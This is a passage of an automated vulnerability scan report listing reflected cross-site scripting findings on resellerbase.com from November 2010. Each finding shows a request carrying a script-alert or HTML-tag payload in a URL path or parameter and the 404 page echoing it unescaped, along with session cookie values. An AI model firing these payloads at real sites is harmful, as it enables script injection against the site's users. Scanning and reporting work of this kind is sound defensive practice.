HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail1d6bd<script>alert(1)</script>35f89b6807a/38/ was not found on this server.</p>
...[SNIP]...

2.2550. http://www.resellerbase.com/detail/38/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3a8e0<script>alert(1)</script>13d83415c21 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/383a8e0<script>alert(1)</script>13d83415c21/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/383a8e0<script>alert(1)</script>13d83415c21/ was not found on this server.</p>
...[SNIP]...

2.2551. http://www.resellerbase.com/detail/38/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6974b<script>alert(1)</script>952d6980c76 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/?6974b<script>alert(1)</script>952d6980c76=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/?6974b<script>alert(1)</script>952d6980c76=1 was not found on this server.</p>
...[SNIP]...

2.2552. http://www.resellerbase.com/detail/38/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8d7b6<script>alert(1)</script>ecd887f100073b88e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail8d7b6<script>alert(1)</script>ecd887f100073b88e/38/rating.php?id=38&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/whitelabelcash-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail8d7b6<script>alert(1)</script>ecd887f100073b88e/38/rating.php?id=38&rating=5 was not found on this server.</p>
...[SNIP]...

2.2553. http://www.resellerbase.com/detail/38/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 58e1a<script>alert(1)</script>6514e9748b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail58e1a<script>alert(1)</script>6514e9748b/38/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail58e1a<script>alert(1)</script>6514e9748b/38/rating.php was not found on this server.</p>
...[SNIP]...

2.2554. http://www.resellerbase.com/detail/38/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f1804<script>alert(1)</script>9d92f8f5f904761b8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/38f1804<script>alert(1)</script>9d92f8f5f904761b8/rating.php?id=38&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/whitelabelcash-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38f1804<script>alert(1)</script>9d92f8f5f904761b8/rating.php?id=38&rating=5 was not found on this server.</p>
...[SNIP]...

2.2555. http://www.resellerbase.com/detail/38/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d8416<script>alert(1)</script>b8af34bb5a9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38d8416<script>alert(1)</script>b8af34bb5a9/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38d8416<script>alert(1)</script>b8af34bb5a9/rating.php was not found on this server.</p>
...[SNIP]...

2.2556. http://www.resellerbase.com/detail/38/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ec9d3<script>alert(1)</script>0f69087834d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/rating.phpec9d3<script>alert(1)</script>0f69087834d HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/rating.phpec9d3<script>alert(1)</script>0f69087834d was not found on this server.</p>
...[SNIP]...

2.2557. http://www.resellerbase.com/detail/38/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 574c5<script>alert(1)</script>53512dddd4add4516 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/38/rating.php574c5<script>alert(1)</script>53512dddd4add4516?id=38&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/whitelabelcash-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/rating.php574c5<script>alert(1)</script>53512dddd4add4516?id=38&rating=5 was not found on this server.</p>
...[SNIP]...

2.2558. http://www.resellerbase.com/detail/38/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1cf91<script>alert(1)</script>791a6385f828a599b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/38/rating.php/1cf91<script>alert(1)</script>791a6385f828a599b?id=38&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/whitelabelcash-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/rating.php/1cf91<script>alert(1)</script>791a6385f828a599b?id=38&rating=5 was not found on this server.</p>
...[SNIP]...

2.2559. http://www.resellerbase.com/detail/38/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7c21e<script>alert(1)</script>3cbd3be135 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/rating.php?7c21e<script>alert(1)</script>3cbd3be135=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/rating.php?7c21e<script>alert(1)</script>3cbd3be135=1 was not found on this server.</p>
...[SNIP]...

2.2560. http://www.resellerbase.com/detail/38/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2d2f3<script>alert(1)</script>4e183f99559 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail2d2f3<script>alert(1)</script>4e183f99559/38/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/whitelabelcash-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail2d2f3<script>alert(1)</script>4e183f99559/38/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2561. http://www.resellerbase.com/detail/38/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ee22e<script>alert(1)</script>361b8fe5830 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38ee22e<script>alert(1)</script>361b8fe5830/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/whitelabelcash-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38ee22e<script>alert(1)</script>361b8fe5830/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2562. http://www.resellerbase.com/detail/38/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bae5a<script>alert(1)</script>09ec27f926b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/search.phpbae5a<script>alert(1)</script>09ec27f926b?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/whitelabelcash-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/search.phpbae5a<script>alert(1)</script>09ec27f926b?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2563. http://www.resellerbase.com/detail/38/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/38/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload bd041<a>3ebe4fb077e was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/38/search.php?keyword=search...&Submit3=Searchbd041<a>3ebe4fb077e&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/whitelabelcash-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/search.php?keyword=search...&Submit3=Searchbd041<a>3ebe4fb077e&opt=2 was not found on this server.</p>
...[SNIP]...

2.2564. http://www.resellerbase.com/detail/38/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/38/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 84b0e<a>298db26ffe2 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/38/search.php?keyword=search...84b0e<a>298db26ffe2&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/whitelabelcash-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/search.php?keyword=search...84b0e<a>298db26ffe2&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2565. http://www.resellerbase.com/detail/38/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 56639<script>alert(1)</script>55ad9e51bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/search.php?keyword=search...&Submit3=Search&opt=2&56639<script>alert(1)</script>55ad9e51bd=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/whitelabelcash-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/search.php?keyword=search...&Submit3=Search&opt=2&56639<script>alert(1)</script>55ad9e51bd=1 was not found on this server.</p>
...[SNIP]...

2.2566. http://www.resellerbase.com/detail/38/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/38/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 83fca<a>c770127ee66 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/38/search.php?keyword=search...&Submit3=Search&opt=283fca<a>c770127ee66 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/whitelabelcash-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/search.php?keyword=search...&Submit3=Search&opt=283fca<a>c770127ee66 was not found on this server.</p>
...[SNIP]...

2.2567. http://www.resellerbase.com/detail/38/themes/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6fb9f<script>alert(1)</script>4d006f02854 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail6fb9f<script>alert(1)</script>4d006f02854/38/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail6fb9f<script>alert(1)</script>4d006f02854/38/themes/ was not found on this server.</p>
...[SNIP]...

2.2568. http://www.resellerbase.com/detail/38/themes/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2540d<script>alert(1)</script>6486cfd5712 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/382540d<script>alert(1)</script>6486cfd5712/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/382540d<script>alert(1)</script>6486cfd5712/themes/ was not found on this server.</p>
...[SNIP]...

